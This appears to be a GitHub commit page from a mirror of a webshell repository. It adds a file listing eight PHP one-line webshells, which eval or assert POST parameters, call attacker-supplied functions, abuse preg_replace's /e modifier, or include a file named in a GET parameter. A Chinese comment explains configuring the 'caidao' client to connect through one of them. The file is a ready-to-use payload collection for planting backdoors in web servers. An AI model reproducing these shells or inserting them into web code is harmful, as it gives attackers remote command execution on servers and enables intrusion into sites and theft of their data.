1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-24 00:29:01 +00:00
This commit is contained in:
tennc
2013-09-06 08:38:12 +08:00
parent e47c479d1e
commit 15cd7ad231
4 changed files with 57 additions and 0 deletions

13
php/php一句话 Normal file
View File

@@ -0,0 +1,13 @@
[+]php一句话
1) <?php eval($_POST[sb]);?>
2) <?php @eval($_POST[sb]);?>
3) <?php assert($_POST[sb]);?>
4) <?$_POST['sa']($_POST['sb']);?>
5) <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
6) <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
  //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
  <O>h=@eval($_POST[c]);</O>
7) <script language="php">@eval($_POST[sb])</script>
8) $filename=$_GET['xbid'];
include ($filename);